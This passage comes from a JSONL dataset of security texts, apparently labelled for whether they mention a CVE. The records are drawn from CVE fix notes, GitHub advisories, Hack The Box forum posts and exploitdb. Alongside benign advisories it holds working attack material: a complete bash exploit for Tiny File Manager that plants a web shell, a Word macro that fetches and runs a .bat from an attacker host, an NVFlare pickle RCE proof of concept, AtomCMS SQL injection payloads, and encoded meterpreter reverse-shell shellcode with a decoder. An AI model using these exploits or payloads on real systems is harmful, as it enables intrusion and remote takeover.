Authorization header with the user's credentials. The highest threat from this vulnerability is to confidentiality and integrity.\"}]\n\nFix commit: KEYCLOAK-19177 Disable ECP flow by default for all Saml clients; ecp flow creates only transient users sessions", "source": "cvefixes", "timestamp": "2022-08-23", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "90f057d3f7d8bbe415ba", "text": "CVE: CVE-2022-24863\n\n[{'lang': 'en', 'value': 'http-swagger is an open source wrapper to automatically generate RESTful API documentation with Swagger 2.0. In versions of http-swagger prior to 1.2.6 an attacker may perform a denial of service attack consisting of memory exhaustion on the host system. The cause of the memory exhaustion is down to improper handling of http methods. Users are advised to upgrade. Users unable to upgrade may to restrict the path prefix to the \"GET\" method as a workaround.'}]\n\nFix commit: fix: security improvement (#62)", "source": "cvefixes", "timestamp": "2022-04-18", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "07ef625eb3e3904cb0b4", "text": "Hello did you get the flag if yes , can you give me a hint ? thank you", "source": "hackthebox", "timestamp": "2023-07-13", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "4cb71301e6ad27d3f0ce", "text": "Command injection, commix error\n\nHey, I would like to ask you guys whether you receive an error while testing commix that says: unable to specify host:”target.comHttps”. I noticed that when commix reads a requestFile.txt it automatically adds or somehow reads the host:” target.com ” as “target.comHttps”.", "source": "hackersploit", "timestamp": "2022-04-01", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "c2a4f3e0acbed0f102c9", "text": "muhammara and hummus vulnerable to denial of service by NULL pointer dereference\n\n[Severity: HIGH]\n\n### Impact\nThe package muhammara before 2.6.1, from 3.0.0 and before 3.1.1; all versions of package hummus are vulnerable to Denial of Service (DoS) when supplied with a maliciously crafted PDF file to be parsed.\n\n### Patches\nIt has been patched in 3.1.1 and has been backported to 2.6.1\nHummus has a patch in 1.0.111.\n\n### Workarounds\nDo not process files from untrusted sources or update.\n\n### References\nhttps://nvd.nist.gov/vuln/detail/CVE-2022-25892\nhttps://github.com/galkahana/HummusJS/issues/463\nhttps://github.com/julianhille/MuhammaraJS/issues/214\nhttps://github.com/julianhille/MuhammaraJS/commit/1890fb555eaf171db79b73fdc3ea543bbd63c002\nhttps://github.com/julianhille/MuhammaraJS/commit/90b278d09f16062d93a4160ef0a54d449d739c51\nhttps://security.snyk.io/vuln/SNYK-JS-HUMMUS-3091138\nhttps://security.snyk.io/vuln/SNYK-JS-MUHAMMARA-3060320\n", "source": "github_advisory", "timestamp": "2022-11-01", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "b675ce50f94b2611654f", "text": "Optimizing Netwide Assembler codes in Microsoft Windows\n\nI will will appreciate if someone could review these NASM assembler code for me. Is about encoder decoder. The encoder performs the following: pads the shellcode with NOP opcodes so it is 4 bytes aligned a random byte is generated for each 4 bytes of the shellcode the 4 bytes are put in the reverse order and XORed with the XOR byte process is repeated until the 0x9090aaaa marker is reached For those good at NASM assembler for Microsoft Windows, please could you optimize this code? the Code is working but takes lot of time. The shellcode is a windows/meterpreter/reverse_tcp x86. Code: global main section .text main: jmp short call_shellcode decoder: xor eax, eax xor ebx, ebx xor ecx, ecx xor edx, edx pop esi ; address of shellcode mov edi, 0xaaaa9090 ; end of shellcode marker sub esp, 0x7f ; make room on the stack (512 bytes) sub esp, 0x7f ; make room on the stack sub esp, 0x7f ; make room on the stack sub esp, 0x7f ; make room on the stack decode: mov bl, byte [esi + edx + 1] ; read 1st encoded byte mov bh, byte [esi + edx + 2] ; read 2nd encoded byte mov cl, byte [esi + edx + 3] ; read 3rd encoded byte mov ch, byte [esi + edx + 4] ; read 4th encoded byte xor bl, byte [esi + edx] ; xor with the key byte xor bh, byte [esi + edx] ; xor with the key byte xor cl, byte [esi + edx] ; xor with the key byte xor ch, byte [esi + edx] ; xor with the key byte mov byte [esp + eax], ch ; store in memory in reverse order to restore original shellcode mov byte [esp + eax + 1], cl ; .. mov byte [esp + eax + 2], bh ; .. mov byte [esp + eax + 3], bl ; .. cmp dword [esi + edx + 5], edi ; check if we have reached the end of shellcode marked jz execute_shellcode ; if we do, jump to the shellcode and execute it inc edx inc edx inc edx inc edx inc edx add eax, 4 jnz decode execute_shellcode: jmp short esp call_shellcode: call decoder encoder_shellcode: db 0x71,0x71,0xfe,0x99,0x8d,0x9a,0x13,0xfa,0x9a,0x9a,0x08,0x6c,0xda,0x39,0xed,0x0d,0x86,0x3d,0x5f,0x86,0x6c,0x3e,0xe7,0x60,0x3e,0x8d,0x82,0x72,0xbc,0x99,0x36,0xbd,0x10,0x7c,0x81,0xb0,0x70,0x81,0x98,0xc2,0x43,0x3f,0x22,0x7f,0xef,0xa4,0x65,0x84,0x88,0xa6,0x19,0xde,0x18,0x14,0xd6,0x2d,0x7f,0xc2,0x58,0x64,0xe3,0x68,0xf3,0xb1,0x68,0x39,0xe9,0x38,0x05,0x7b,0x79,0x2e,0x01,0x39,0xf2,0x18,0x54,0x6c,0xd8,0x9d,0x64,0xef,0x34,0xb4,0x65,0xb0,0xe8,0x3b,0xa8,0xf8,0x5c,0xd9,0x8f,0x5d,0x7c,0x75,0x3c,0x49,0x01,0xbc,0x56,0x62,0xdd,0xa9,0x67,0xc8,0xf9,0x1e,0xc9,0x43,0xfa,0x35,0x3b,0x56,0x3a,0xee,0xd6,0x29,0xef,0xe3,0xa9,0xaa,0x5d,0xdc,0x49,0xcf,0xb2,0xf4,0x37,0xb2,0xea,0xb2,0x0a,0x9f,0xce,0x1a,0x1b,0x3e,0x42,0x91,0x8c,0x80,0x07,0xea,0x5f,0xcf,0xd3,0x97,0x44,0x84,0xfa,0xfe,0x71,0x29,0xfb,0xe1,0x68,0x31,0xe0,0x6a,0xf2,0xa9,0xd6,0xd6,0xb6,0x3a,0x60,0x63,0x5b,0x61,0xd3,0x8b,0x33,0x2c,0x82,0xfb,0xe9,0x70,0xa1,0xa4,0x05,0xfa,0xfa,0x85,0xec,0x41,0x72,0x29,0x1c,0xbe,0xe5,0x8d,0xe5,0xe5,0xd7,0x90,0xcf,0xa2,0xe3,0xe7,0x07,0x70,0x4b,0x6f,0x53,0x4f,0xa7,0xc6,0x48,0x69,0xd7,0x47,0x6f,0x07,0x28,0xde,0xf7,0xde,0xde,0xdf,0x98,0xf0,0xc8,0xcc,0x5c,0xba,0xba,0xd1,0x3a,0x93,0x7c,0x76,0x16,0xa9,0x83,0x36,0x0e,0x9e,0xf6,0x5e,0x1f,0x1f,0x1d,0x77,0x1e,0x14,0xf2,0x9d,0x48,0x05,0xea,0xba,0xba,0xba,0xba,0x87,0xd7,0xc7,0xd7,0xc7,0x05,0xda,0x0a,0xef,0x6d,0xb3,0x24,0x66,0x4c,0x53,0x30,0x67,0x66,0x20,0x5a,0xa9,0xdd,0x0c,0x30,0xc1,0x3a,0xbf,0xef,0xc5,0x5b,0xa2,0x5d,0xa8,0xd6,0x62,0x67,0x8b,0x12,0x6f,0x29,0x9e,0x9e,0x9e,0xf9,0x76,0x60,0x0a,0x60,0x0a,0x60,0xbb,0xd3,0xec,0xed,0xbf,0xc6,0x99,0x0e,0x1f,0xc4,0xa2,0x5a,0x21,0x77,0x5d,0x98,0x13,0xae,0xe6,0x98,0xc0,0xa8,0x80,0xaa,0xf6,0x27,0x27,0x27,0x37,0x27,0xd9,0xb1,0xd9,0xb3,0x8f,0x03,0xe6,0x50,0xa7,0x5b,0x6c,0x3f,0xff,0xb9,0x93,0x4a,0x19,0x1c,0x4a,0x20,0x20,0xf9,0x22,0x48,0x77,0x4e,0x9b,0xb1,0x11,0x86,0xf6,0x8b,0xf6,0x0e,0x75,0xa1,0xa1,0xc9,0xf9,0x89,0xbc,0xd6,0xbc,0xbc,0xfc,0x37,0x3c,0x5f,0x67,0x37,0x20,0xdf,0x10,0x2f,0x0f,0x36,0x43,0x5e,0x61,0xe3,0xc2,0x3d,0xa3,0x8f,0xac,0x11,0xee,0x4f,0x4f,0xc4,0x9a,0x1f,0x95,0xbe,0x96,0x79,0x86,0x86,0x86,0x09,0x28,0xd7,0xd7,0xb3,0xc1,0xf7,0xde,0x34,0xf6,0x08,0x8a,0x49,0x4b,0xff,0x4c,0x4a,0xe8,0xff,0xba,0xf1,", "source": "go4expert", "timestamp": "2022-09-05", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "92660f909479edf3350b", "text": "CVE: CVE-2022-1850\n\n[{'lang': 'en', 'value': 'Path Traversal in GitHub repository filegator/filegator prior to 7.8.0.'}]\n\nFix commit: path traversal fix", "source": "cvefixes", "timestamp": "2022-05-24", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "f4ebd449e4ae65dc222d", "text": "NVFLARE < 2.1.4 - Unsafe Deserialization due to Pickle\n\n# Exploit Title: NVFLARE < 2.1.4 - Unsafe Deserialization due to Pickle\n# Exploit Author: Elias Hohl\n# Google Dork: N/A\n# Date: 2022-06-21\n# Vendor Homepage: https://www.nvidia.com\n# Software Link: https://github.com/NVIDIA/NVFlare\n# Version: < 2.1.4\n# Tested on: Ubuntu 20.04\n# CVE : CVE-2022-34668\n\nhttps://medium.com/@elias.hohl/remote-code-execution-in-nvidia-nvflare-c140bb6a2d55\n\nThere is a Remote Code Execution vulnerability https://github.com/NVIDIA/NVFlare. It is possible to execute arbitrary commands on the server for connected clients. It was not investigated if server can also execute commands on all clients (I expect this though, as it is by design required for the server to instruct the clients to execute commands if they need to train specific models). The consequence would be that a client can gain Remote Code Execution on the server an ALL connected clients.\n\nThe vulnerability exists due to the deserialization of user data with the pickle module. There are multiple places where this is done, I considered line 568 on private/fed/server/fed_server.py the occurrence that is accessible with the least efforts and thus used it in my PoC-Exploit.\n\nThe client generates a malicious data packet like this: aux_message.data[\"fl_context\"].CopyFrom(bytes_to_proto(generate_payload('curl http://127.0.0.1:4321')))\n\n\n\nREPLICATION\n\nThis example uses the server in poc-mode. The provision mode seems to run the same code in fed_server.py though and should be vulnerable as well. (To my understanding, the modes differ only regarding credentials).\n\nThis exploit replicates the Quickstart tutorial https://nvidia.github.io/NVFlare/quickstart.html with a maliciously modified client to execute commands on the server.\n\nMake sure to use Python 3.8, the nightly builds don't work with Python >=3.9.\n\nsudo apt update\nsudo apt-get install python3-venv curl\n\npython3 -m venv nvflare-env\n\nsource nvflare-env/bin/activate\n\npython3 -m pip install -U pip\npython3 -m pip install -U setuptools\npython3 -m pip install torch torchvision tensorboard\n\ngit clone https://github.com/NVIDIA/NVFlare.git\ncd NVFlare\ngit checkout 2.1.2\ngit apply nvflare-exploit-apply.txt # note that this only modifies the client side code\npython3 -m pip install .\n\ncd\npoc -n 2\n\nmkdir -p poc/admin/transfer\ncp -rf NVFlare/examples/* poc/admin/transfer\n\nIn four separate terminals, execute (after running source nvflare-env/bin/activate in each one):\n\n./poc/server/startup/start.sh\n\n./poc/site-1/startup/start.sh\n\n./poc/site-2/startup/start.sh\n\n./poc/admin/startup/fl_admin.sh localhost\n\nIn another terminal window, fire up a netcat instance to verify that Remote Code Execution is possible:\nnc -lvp 4321\n\nIn the admin console, execute:\n\ncheck_status server\n\nto verify both clients are connected. Then:\n\nsubmit_job hello-pt-tb\n\nIt will take a few minutes until the job finishes downloading the required files, then you should see a connection in the netcat tab and error messages in the server tab (because the received pickle payload is no data that the program can continue working with). You can also shutdown netcat, which will result in \"Connection refused\" errors in the server tab.", "source": "exploitdb", "timestamp": "2023-03-25", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "fc733cc1d53b78266e11", "text": "I literally can’t get pass this login screen. I’m providing the correct credentials, but it just don’t work. This exercise should have been with a pcap file… such a pain just to make it work…", "source": "hackthebox", "timestamp": "2022-07-03", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "edf8f2a2571bf2c9d4e4", "text": "An introduction to Google Dorking\n\nHello everyone. Did you know that there is a useful tool for information gathering and recon right in your Chrome browser? Meet Google Dorking a way of searching for files or keywords in specific websites to find admin portals, unprotected files, logins, and more! Today I will teach you some basic “commands” for this tool. how to find filetypes on a specific website or keyword Using this you can find filetypes or names in a certain website. This can sometimes expose password lists, logins, and important files. To do so input this syntax: filetype:log or site:youtube.com filetype:pdf or site:https://www.google.com/ ext:pdf Show all subdirectories or subpages in a website You can use this feature to find hidden pages or just get a more detailed view of a site site:domainname or site:https//domainname/ find a specific text result in a webpage You can use a command like this to find login pages or info in the site or the sites source code intext:usernames or allintext:\"username\" \"password\" This was a tutorial on some simple Google Dorking commands. I hope that you find this helpful and have a great week! -C_J", "source": "hackersploit", "timestamp": "2023-02-03", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "c69ff51db68f18a83ea1", "text": "CVE: CVE-2021-45010\n\n[{'lang': 'en', 'value': 'A path traversal vulnerability in the file upload functionality in tinyfilemanager.php in Tiny File Manager before 2.4.7 allows remote attackers (with valid user accounts) to upload malicious PHP files to the webroot, leading to code execution.'}]\n\nFix commit: Patched the RCE (#636)\n\nI have patched the file upload directory traversal to Authenticated Remote Code Execution Vulnerability.", "source": "cvefixes", "timestamp": "2022-03-15", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "59ecbce590ca95f675d0", "text": "CVE: CVE-2022-0721\n\n[{'lang': 'en', 'value': 'Insertion of Sensitive Information Into Debugging Code in GitHub repository microweber/microweber prior to 1.3.'}]\n\nFix commit: Update Handler.php", "source": "cvefixes", "timestamp": "2022-02-23", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "6a194376224b6f2a6672", "text": "CVE: CVE-2022-0409\n\n[{'lang': 'en', 'value': 'Unrestricted Upload of File with Dangerous Type in Packagist showdoc/showdoc prior to 2.10.2.'}]\n\nFix commit: File upload vulnerability", "source": "cvefixes", "timestamp": "2022-02-19", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "1e2f1707153739c37307", "text": "Thanks for the instructions. I did find the injection point and I am getting the “malicious” message. I have tried various ways to obfuscate the requests. For example the request below: Gives this response: Error while moving: mv: cannot stat ‘/var/www/html/files/2561732172.txt’: No such file or directory mv: cannot move ‘/flag.txt’ to ‘/var/www/html/files/tmp/flag.txt’: Permission denied The system (index.php file) understands the request but one cannot write to tmp directory. Could you elaborate on the hint: “<<<” Do you mean to obfuscate the file name only or a whole new command like “cat /flag.txt”? Thanks a lot.", "source": "hackthebox", "timestamp": "2023-01-16", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "2807d2afa6a2cc7ef947", "text": "CVE: CVE-2022-0359\n\n[{'lang': 'en', 'value': 'Heap-based Buffer Overflow in GitHub repository vim/vim prior to 8.2.'}]\n\nFix commit: patch 8.2.4214: illegal memory access with large 'tabstop' in Ex mode\n\nProblem: Illegal memory access with large 'tabstop' in Ex mode.\nSolution: Allocate enough memory.", "source": "cvefixes", "timestamp": "2022-01-26", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "f8f87b83c7bf69c7bb63", "text": "Jenkins Cross-site Scripting vulnerability\n\n[Severity: MEDIUM]\n\nCross-site scripting (XSS) vulnerability in Jenkins before 1.606 and LTS before 1.596.2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2015-1813.", "source": "github_advisory", "timestamp": "2022-05-17", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "bdcd61097b28809aa873", "text": "TPM 1.2 key authorization values vulnerable to TPM transport eavesdropper in go-tpm\n\n[Severity: HIGH]\n\n### Impact\nTPM 2.0 users are unaffected by this issue.\n\nAn adversary eavesdropping on the TPM 1.2 transport path can calculate `usageAuth` for a key created with CreateWrapKey, even though this value is encrypted as part of the TPM 1.2 command protocol.\n\nThe TPM 1.2 CreateWrapKey command accepts two secrets: `usageAuth` and `migrationAuth`. The ADIP protocol ([TPM 1.2 specification, part 1, section 13.4](https://trustedcomputinggroup.org/wp-content/uploads/TPM-Main-Part-1-Design-Principles_v1.2_rev116_01032011.pdf)) calls for these values to be encrypted with two different XOR keys. Due to a bug in go-tpm prior to version 0.3.0, both `usageAuth` and `migrationAuth` are encrypted with the same XOR keystream. This allows an adversary to XOR `encUsageAuth` and `encMigrationAuth` together to calculate `usageAuth ^ encMigrationAuth`. Since `migrationAuth` is moot for all keys created with go-tpm's `CreateWrapKey` (since all keys created with this function are marked non-migratable), an adversary may guess or know (from code/binary inspection) that `migrationAuth` is all 0x00 bytes or some other fixed value. Such an adversary can then calculate `usageAuth` and use this value later to improperly use the created key, unbeknownst to the creator of the key.\n\n### Patches\nFixed in go-tpm version 0.3.0.\n\n### Workarounds\n\n- TPM 2.0 users: No workaround needed. This issue only affects TPM 1.2 users.\n- TPM 1.2 users: Call CreateWrapKey with a random 20-byte value for `migrationAuth`, even though that value is not used again (since CreateWrapKey creates keys that are non-migratable). Do not store or log this value.\n\n\n### Details\n\nTPM 1.2 uses a protocol called ADIP (Authorization Data Insertion Protocol) to encrypt authorization values over-the-wire for newly created objects. This prevents a bus-snooping attack like those publicized by TPM Genie. TPM 2.0 makes this optional (the way to do it is with parameter-encryption sessions). You can read more about ADIP in section 13.4 of Part 1: Design Principles in the latest [TPM 1.2 specification](https://trustedcomputinggroup.org/resource/tpm-main-specification/). Normally, ADIP consists of the following steps:\n```\nKey := SHA1(authSession.SharedSecret || a nonce)\nNote: nonces and auth values in TPM 1.2 are always 20 bytes\nEncAuth := XOR(Key, Auth)\n```\nWhen commands require one ADIP-encrypted auth value, the nonce is the last nonceEven (last nonce from the TPM).\nWhen commands require two ADIP-encrypted auth values, the nonce for the first auth value is still nonceEven, and the nonce for the second auth value is the last nonceOdd, which is the one being provided by the caller along with the current command on the session.\nThe reason for this is that you wouldn't want an adversary to be able to XOR the two encrypted auth values together and come up with (auth 1 XOR key) XOR (auth 2 XOR key) where the \"one-time\" pad key is used twice and cancels itself out.\n\nHere are the commands that take one authorization value by ADIP:\n\n- Seal (the sealed data's auth value)\n- Sealx (the sealed data's auth value)\n- CreateKey (the key's auth value)\n- MakeIdentity (the AIK's auth value)\n- ChangeAuth (the entity's new auth value)\n- ChangeAuthOwner (the new owner auth value)\n- Delegate_CreateKeyDelegation (the new delegation auth value)\n- Delegate_CreateOwnerDelegation (the new delegation auth value)\n- NV_DefineSpace (the NV's auth value)\n- CreateCounter (the counter's auth value)\n\nHere are the commands that take two authorization values by ADIP:\n\n- CreateWrapKey (the key's auth value, and the key's migration (to export out of the TPM) auth value)\n\nThe migrationAuth value is never used if the key does not have the `TPM_KEY_FLAGS.migratable` flag set on it. go-tpm does not currently allow the caller to set this flag.\nHere was the bug in our implementation of `CreateWrapKey()`:\n\nhttps://github.com/google/go-tpm/blob/16766ac4521425bd02ad23868fbdf24749268669/tpm/tpm.go#L1322-L1329\n\nHere we see that both usageAuth and m", "source": "github_advisory", "timestamp": "2022-02-11", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "ea7861faf34e3bae1c75", "text": "Tiny File Manager 2.4.6 - Remote Code Execution (RCE)\n\n# Exploit Title: Tiny File Manager 2.4.6 - Remote Code Execution (RCE)\n# Date: 14/03/2022\n# Exploit Author: FEBIN MON SAJI\n# Software Link: https://github.com/prasathmani/tinyfilemanager\n# Version: Tiny File Manager <= 2.4.6\n# Tested on: Ubuntu 20.04\n# CVE : CVE-2021-40964\n# Reference: https://febin0x4e4a.wordpress.com/2022/01/23/tiny-file-manager-authenticated-rce/\n\n#!/bin/bash\n\ncheck(){\n\nwhich curl\nif [ $? = 0 ]\nthen\nprintf \"[✔] Curl found! \\n\"\nelse\nprintf \"[❌] Curl not found! \\n\"\nexit\nfi\n\nwhich jq\nif [ $? = 0 ]\nthen\nprintf \"[✔] jq found! \\n\"\nelse\nprintf \"[❌] jq not found! \\n\"\nexit\nfi\n}\nusage(){\n\nprintf \"\nTIny File Manager Authenticated RCE Exploit.\n\nBy FEBIN\n\n$0 \n\nExample: $0 http://files.ubuntu.local/index.php admin \\\"admin@123\\\"\n\n\"\n}\n\nlog-in(){\nURL=$1\nadmin=$2\npass=$3\ncookie=$(curl \"$URL\" -X POST -s -d \"fm_usr=$admin&fm_pwd=$pass\" -i | grep \"Set-Cookie: \" | sed s/\"Set-Cookie: \"//g | tr -d \" \" | tr \";\" \"\\n\" | head -1)\n\nif [ $cookie ]\nthen\nprintf \"\\n[+] Login Success! Cookie: $cookie \\n\"\nelse\nprintf \"\\n[-] Logn Failed! \\n\"\nfi\n\nURL=${URL}\n}\n\nfind_webroot(){\n\n\nwebroot=$(curl -X POST \"$URL?p=&upload\" -d \"type=upload&uploadurl=http://vyvyuytcuytcuycuytuy/&ajax=true\" -H \"Cookie: $cookie\" -s | jq | grep file | tr -d '\"' | tr -d \",\" | tr -d \" \" | sed s/\"file:\"//g | tr \"/\" \"\\n\" | head --lines=-1 | tr \"\\n\" \"/\" )\n\n\nif [ $webroot ]\nthen\nprintf \"\\n[*] Try to Leak Web root directory path \\n\\n\"\nprintf \"[+] Found WEBROOT directory for tinyfilemanager using full path disclosure bug : $webroot \\n\\n\"\nelse\nprintf \"[-] Can't find WEBROOT! Using default /var/www/html \\n\"\nwebroot=\"/var/www/html\"\nfi\n}\n\nupload(){\n\n#webroot=\"/var/www/tiny/\"\nshell=\"shell$RANDOM.php\"\necho \"\" > /tmp/$shell\n\n\n\ncurl $URL?p= -X POST -s -H \"User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0\" -b $cookie -F \"p=\" -F \"fullpath=../../../../../../../..${webroot}/${shell}\" -F \"file=@/tmp/$shell\" | grep \"successful\"\n\n\n}\n\nexploit(){\n\nWEB_URL=$(printf \"$URL\" | tr \"/\" \"\\n\" | head --lines=-1 | tr \"\\n\" \"/\")\n\nupload\n\n\nif [ $? = 0 ]\nthen\nprintf \"[+] File Upload Successful! \\n\"\nelse\nprintf \"[-] File Upload Unsuccessful! Exiting! \\n\"\nexit 1\nfi\n\n\nprintf \"[+] Checking for the shell \\n\"\n\n\ncurl ${WEB_URL}/${shell}?cmd=echo%20found -s | head -1 | grep \"found\" >/dev/null\nif [ $? = 0 ]\nthen\nprintf \"[+] Shell found ${WEB_URL}/$shell \\n\"\nelse\nprintf \"[-] Shell not Found! It might be uploaded somewhere else in the server or got deleted. Exiting! \\n\"\nexit 2\nfi\n\nprintf \"[+] Getting shell access! \\n\\n\"\n\nwhile true\ndo\nprintf \"$> \"\nread cmd\ncurl ${WEB_URL}/$shell -s -X POST -d \"cmd=${cmd}\"\ndone\n}\n\nif [ $1 ] && [ $2 ] && [ $3 ]\nthen\ncheck\nlog-in $1 $2 $3\n\nfind_webroot\n\n\nexploit\nelse\nusage\nfi", "source": "exploitdb", "timestamp": "2022-03-16", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "11b9f0e239d8ec64975d", "text": "Thanks, I got this worked out yesterday using a different win32 class other than BIOS. I am not sure if that is the same thing that you are referring to as your answer is masked as it is too direct of an answer. Thanks for much for helping though!", "source": "hackthebox", "timestamp": "2022-09-19", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "a6f4f9ce7b5d3983b6ec", "text": "Microsoft Outlook Microsoft 365 MSO (Version 2306 Build 16.0.16529.20100) 32-bit - Remote Code Execution\n\n## Title: Microsoft Outlook Microsoft 365 MSO (Version 2306 Build 16.0.16529.20100) 32-bit - Remote Code Execution\n## Author: nu11secur1ty\n## Date: 07.07.2023\n## Vendor: https://www.microsoft.com/\n## Software: https://outlook.live.com/owa/\n## Reference: https://www.crowdstrike.com/cybersecurity-101/remote-code-execution-rce/\n## CVE-2023-33131\n\n\n## Description:\nIn this vulnerability, the Microsoft Outlook app allows an attacker to\nsend an infected Word file with malicious content\nto everyone who using the Outlook app, no matter web or local.\nMicrosoft still doesn't have a patch against this 0-day vulnerability today.\n\n## Staus: HIGH Vulnerability\n\n[+]Exploit:\n\n- The malicious Word file:\n\n```js\nSub AutoOpen()\n Call Shell(\"cmd.exe /S /c\" & \"curl -s\nhttps://attacker/namaikativputkata/sichko/nikoganqqsaopraite.bat >\nnikoganqqsaopraite.bat && .\\nikoganqqsaopraite.bat\", vbNormalFocus)\nEnd Sub\n\n```\n\n## Reproduce:\n[href](https://github.com/nu11secur1ty/Windows11Exploits/tree/main/2023/CVE-2023-33131)\n\n## Proof and Exploit\n[href](https://www.nu11secur1ty.com/2023/07/cve-2023-33131-microsoft-outlook.html)\n\n## Time spend:\n00:30:00", "source": "exploitdb", "timestamp": "2023-07-07", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "04e72a9b5463017fdda5", "text": "I am still having issues with this. I wonder if somebody can give me another clue", "source": "hackthebox", "timestamp": "2022-04-01", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "3efbabef005d954c3389", "text": "CVE: CVE-2022-1382\n\n[{'lang': 'en', 'value': 'NULL Pointer Dereference in GitHub repository radareorg/radare2 prior to 5.6.8. This vulnerability is capable of making the radare2 crash, thus affecting the availability of the system.'}]\n\nFix commit: Fix null deref in ne parser ##crash\n\n* Reported by @cnitlrt via huntr.dev\n* BountyID: d8b6d239-6d7b-4783-b26b-5be848c01aa1/\n* Reproducer: nenull", "source": "cvefixes", "timestamp": "2022-04-18", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "5af13407b2aa8ffe46fd", "text": "CVE: CVE-2022-31138\n\n[{'lang': 'en', 'value': 'mailcow is a mailserver suite. Prior to mailcow-dockerized version 2022-06a, an extended privilege vulnerability can be exploited by manipulating the custom parameters regexmess, skipmess, regexflag, delete2foldersonly, delete2foldersbutnot, regextrans2, pipemess, or maxlinelengthcmd to execute arbitrary code. Users should update their mailcow instances with the `update.sh` script in the mailcow root directory to 2022-06a or newer to receive a patch for this issue. As a temporary workaround, the Syncjob ACL can be removed from all mailbox users, preventing changes to those settings.'}]\n\nFix commit: hotfix imapsync", "source": "cvefixes", "timestamp": "2022-07-11", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "5bd781c3aa378d24897a", "text": "AtomCMS v2.0 - SQLi\n\n# Exploit Title: AtomCMS v2.0 - SQLi\n# Date: 08/02/2022\n# Exploit Author: Luca Cuzzolin aka czz78\n# Vendor Homepage: https://github.com/thedigicraft/Atom.CMS\n# Version: v2.0\n# Category: Webapps\n# Tested on: Debian linux\n# CVE : CVE-2022-24223\n\n\n====================================================\n\n# PoC : SQLi :\n\nhttp://127.0.0.1/Atom.CMS/admin/login.php\n\n\nPOST /Atom.CMS/admin/login.php HTTP/1.1\nHost: 127.0.0.1\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101\nFirefox/91.0\nAccept:\ntext/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nAccept-Language: it,en-US;q=0.7,en;q=0.3\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 35\nOrigin: http://127.0.0.1\nConnection: keep-alive\nReferer: http://127.0.0.1/Atom.CMS/admin/login.php\nCookie: PHPSESSID=tqfebdu4kn9qj7g6qpa91j9859\nUpgrade-Insecure-Requests: 1\nSec-Fetch-Dest: document\nSec-Fetch-Mode: navigate\nSec-Fetch-Site: same-origin\nSec-Fetch-User: ?1\nemail=test%40test.com&password=1234\n\n\nVulnerable Payload :\n\nParameter: email (POST)\n Type: time-based blind\n Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)\n Payload: email=test@test.com' AND (SELECT 5613 FROM\n(SELECT(SLEEP(5)))JnLZ) AND 'pROE'='pROE&password=1234\n Vector: AND (SELECT [RANDNUM] FROM\n(SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])\n\n Type: UNION query\n Title: Generic UNION query (NULL) - 6 columns\n Payload: email=test@test.com' UNION ALL SELECT\nNULL,CONCAT(0x717a767a71,0x65557a784e446152424b63724b5a737062464a4267746c70794d5976484c484a5365634158734975,0x71627a7871),NULL,NULL,NULL,NULL--\n-&password=1234\n Vector: UNION ALL SELECT NULL,[QUERY],NULL,NULL,NULL,NULL-- -\n---\n\n\n\n====================================================", "source": "exploitdb", "timestamp": "2022-02-09", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "52a17f4374bf3d9a3199", "text": "CVE: CVE-2021-33318\n\n[{'lang': 'en', 'value': 'An Input Validation Vulnerability exists in Joel Christner .NET C# packages WatsonWebserver, IpMatcher 1.0.4.1 and below (IpMatcher) and 4.1.3 and below (WatsonWebserver) due to insufficient validation of input IP addresses and netmasks against the internal Matcher list of IP addresses and subnets.'}]\n\nFix commit: NuGet v1.0.4.2, fix for SICK-2021-060", "source": "cvefixes", "timestamp": "2022-05-16", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "7f9e265ef189bbe49f57", "text": "ChakraCore RCE Vulnerability\n\n[Severity: HIGH]\n\nMicrosoft Edge and ChakraCore in Microsoft Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allows remote code execution, due to how the scripting engine handles objects in memory, aka \"Scripting Engine Memory Corruption Vulnerability\". This CVE ID is unique from CVE-2018-0834, CVE-2018-0835, CVE-2018-0836, CVE-2018-0837, CVE-2018-0840, CVE-2018-0856, CVE-2018-0857, CVE-2018-0858, CVE-2018-0859, CVE-2018-0860, CVE-2018-0861, and CVE-2018-0866.", "source": "github_advisory", "timestamp": "2022-05-13", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "09469c574b69eb124035", "text": "CVE: CVE-2021-43288\n\n[{'lang': 'en', 'value': 'An issue was discovered in ThoughtWorks GoCD before 21.3.0. An attacker in control of a GoCD Agent can plant malicious JavaScript into a failed Job Report.'}]\n\nFix commit: #000 - 